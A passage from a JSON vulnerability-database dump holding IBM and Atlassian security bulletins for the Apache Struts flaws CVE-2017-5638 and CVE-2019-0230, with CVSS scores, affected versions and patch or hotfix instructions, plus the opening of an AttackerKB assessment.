"cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:34:31", "id": "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "href": "https://www.ibm.com/support/pages/node/697609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:33", "description": "## Summary\n\nIBM Sterling Order Management use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP2_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP3_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP5_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:09:19", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-16T20:09:19", "id": "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "href": "https://www.ibm.com/support/pages/node/558281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T18:17:25", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of SAN Volume Controller, Storwize family and FlashSystem V9000 products allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \n \nAll products are affected when running supported releases 7.1 to 7.8. For unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>) \n \nFor IBM FlashSystem V9000, upgrade to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-03-29T01:48:02", "id": "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "href": "https://www.ibm.com/support/pages/node/697171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:34", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics version 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF19](<http://www.ibm.com/support/docview.wss?uid=swg24043514>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:50:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:50:04", "id": "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "href": "https://www.ibm.com/support/pages/node/558271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2020-08-21T03:44:55", "description": "h3. Issue Summary\r\nRecently, Apache released the following report regarding two different vulnerabilities in Struts 2:\r\n\r\n[|https://struts.apache.org/announce.html#a20200813]\r\n\r\nIs Confluence affected by these CVEs?\r\n\r\nh3. Steps to Reproduce\r\n Not applicable.\r\n\r\nh3. Expected Results\r\n Not applicable\r\n\r\nh3. Actual Results\r\n Not applicable\r\n\r\nh3. Workaround\r\n Not applicable\r\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-18T13:48:36", "type": "atlassian", "title": "Struts 2 CVE-2019-0230 and CVE-2019-0233 impact on Confluence", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0233", "CVE-2019-0230"], "modified": "2020-08-21T00:02:20", "id": "ATLASSIAN:CONFSERVER-60189", "href": "https://jira.atlassian.com/browse/CONFSERVER-60189", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T19:34:34", "description": "*Description*\r\n\r\nBamboo used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. Attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of Bamboo\r\n\r\n*Affected versions:*\r\n * All versions of Bamboo\u00a0from *5.1.0*\u00a0before *5.14.5*\u00a0(the fixed version for 5.14.x) and from *5.15.0* but less than *5.15.3* (the fixed version for\u00a05.15.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Bamboo*\u00a05.15.3 is available for download from [https://www.atlassian.com/software/bamboo/download].\r\n * *Bamboo*\u00a05.14.5 is available for download from [https://www.atlassian.com/software/bamboo/download-archives].\r\n\r\n*Hotfix:*\r\n The preferred fix is to upgrade your Bamboo using one of the links from the *Fix* section. If you cannot schedule an upgrade immediately, you can replace the affected library as a temporary workaround.\r\n * *Bamboo* 5.9.x, 5.10.x, 5.11.x, 5.12.x - use\u00a0[^struts2-core-2.3.16.3-atlassian-7.jar]\r\n * *Bamboo* 5.13.x - use\u00a0[^struts2-core-2.5.1-atlassian-11.jar] (this jar has struts2 version 2.5.1 with the same fix applied in version 2.5.10.1)\r\n\r\nTo replace the library, remove the existing struts2-core library from $BAMBOO_DIR/WEB-INF/lib, replace it with one matching your Bamboo version and restart your Bamboo server. This temporary solution is provided only for your convenience and an upgrade to an official Bamboo release should be scheduled as soon as possible.\r\n\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/_slDN].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-10T04:57:51", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2019-08-19T02:05:22", "id": "BAM-18242", "href": "https://jira.atlassian.com/browse/BAM-18242", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:48", "description": "*Description*\r\n Crowd used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. Attackers can use this vulnerability to execute\u00a0Java code of their choice on systems that have a vulnerable version of Crowd.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd\u00a0*from 2.8.3* before *2.9.7* (the fixed version for 2.9.x), from version *2.10.1* before *2.10.3* (the fixed version for 2.10.x) and from version *2.11.0*\u00a0before *2.11.1*\u00a0(the fixed version for 2.11.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Crowd* 2.11.1 is available for download from [https://www.atlassian.com/software/crowd/download].\r\n * *Crowd* 2.10.3 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n * *Crowd* 2.9.7 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n\r\n\u00a0*Hotfix:*\r\nThe preferred fix is to upgrade Crowd to a version that's not vulnerable (see the *Fix* section). If you cannot schedule an upgrade immediately, and are using Crowd 2.10 or 2.11, you can replace the affected library as a temporary workaround.\r\n\r\nTo replace the library:\r\n# Stop Crowd\r\n# Download [struts2-core-2.3.32.jar|https://maven.atlassian.com/content/groups/public/org/apache/struts/struts2-core/2.3.32/struts2-core-2.3.32.jar]\r\n# Remove all existing copies of struts2-core-2.3.29.jar:\r\n{code}\r\n./crowd-openidclient-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-openidserver-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./demo-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n{code}\r\n# Copy the downloaded struts2-core-2.3.32.jar into each of the lib/ directories you removed the jar from\r\n# Restart Crowd\r\n\r\nThis temporary solution is provided only for your convenience and an upgrade to an official Crowd release should be scheduled as soon as possible.\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/crowd/crowd-security-advisory-2017-03-10-876857916.html].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-10T04:31:09", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-24T05:01:02", "id": "ATLASSIAN:CWD-4879", "href": "https://jira.atlassian.com/browse/CWD-4879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:00:12", "description": "*Description*\r\n Crowd used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. Attackers can use this vulnerability to execute\u00a0Java code of their choice on systems that have a vulnerable version of Crowd.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd\u00a0*from 2.8.3* before *2.9.7* (the fixed version for 2.9.x), from version *2.10.1* before *2.10.3* (the fixed version for 2.10.x) and from version *2.11.0*\u00a0before *2.11.1*\u00a0(the fixed version for 2.11.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Crowd* 2.11.1 is available for download from [https://www.atlassian.com/software/crowd/download].\r\n * *Crowd* 2.10.3 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n * *Crowd* 2.9.7 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n\r\n\u00a0*Hotfix:*\r\nThe preferred fix is to upgrade Crowd to a version that's not vulnerable (see the *Fix* section). If you cannot schedule an upgrade immediately, and are using Crowd 2.10 or 2.11, you can replace the affected library as a temporary workaround.\r\n\r\nTo replace the library:\r\n# Stop Crowd\r\n# Download [struts2-core-2.3.32.jar|https://maven.atlassian.com/content/groups/public/org/apache/struts/struts2-core/2.3.32/struts2-core-2.3.32.jar]\r\n# Remove all existing copies of struts2-core-2.3.29.jar:\r\n{code}\r\n./crowd-openidclient-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-openidserver-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./demo-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n{code}\r\n# Copy the downloaded struts2-core-2.3.32.jar into each of the lib/ directories you removed the jar from\r\n# Restart Crowd\r\n\r\nThis temporary solution is provided only for your convenience and an upgrade to an official Crowd release should be scheduled as soon as possible.\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/crowd/crowd-security-advisory-2017-03-10-876857916.html].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-10T04:31:09", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-24T05:01:02", "id": "CWD-4879", "href": "https://jira.atlassian.com/browse/CWD-4879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:47", "description": "*Description*\r\n\r\nBamboo used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. Attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of Bamboo\r\n\r\n*Affected versions:*\r\n * All versions of Bamboo\u00a0from *5.1.0*\u00a0before *5.14.5*\u00a0(the fixed version for 5.14.x) and from *5.15.0* but less than *5.15.3* (the fixed version for\u00a05.15.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Bamboo*\u00a05.15.3 is available for download from [https://www.atlassian.com/software/bamboo/download].\r\n * *Bamboo*\u00a05.14.5 is available for download from [https://www.atlassian.com/software/bamboo/download-archives].\r\n\r\n*Hotfix:*\r\n The preferred fix is to upgrade your Bamboo using one of the links from the *Fix* section. If you cannot schedule an upgrade immediately, you can replace the affected library as a temporary workaround.\r\n * *Bamboo* 5.9.x, 5.10.x, 5.11.x, 5.12.x - use\u00a0[^struts2-core-2.3.16.3-atlassian-7.jar]\r\n * *Bamboo* 5.13.x - use\u00a0[^struts2-core-2.5.1-atlassian-11.jar] (this jar has struts2 version 2.5.1 with the same fix applied in version 2.5.10.1)\r\n\r\nTo replace the library, remove the existing struts2-core library from $BAMBOO_DIR/WEB-INF/lib, replace it with one matching your Bamboo version and restart your Bamboo server. This temporary solution is provided only for your convenience and an upgrade to an official Bamboo release should be scheduled as soon as possible.\r\n\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/_slDN].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-10T04:57:51", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2019-08-19T02:05:22", "id": "ATLASSIAN:BAM-18242", "href": "https://jira.atlassian.com/browse/BAM-18242", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:37", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-19T05:03:06", "id": "ATLASSIAN:CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T19:10:15", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-30T21:21:15", "id": "CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:44:49", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after 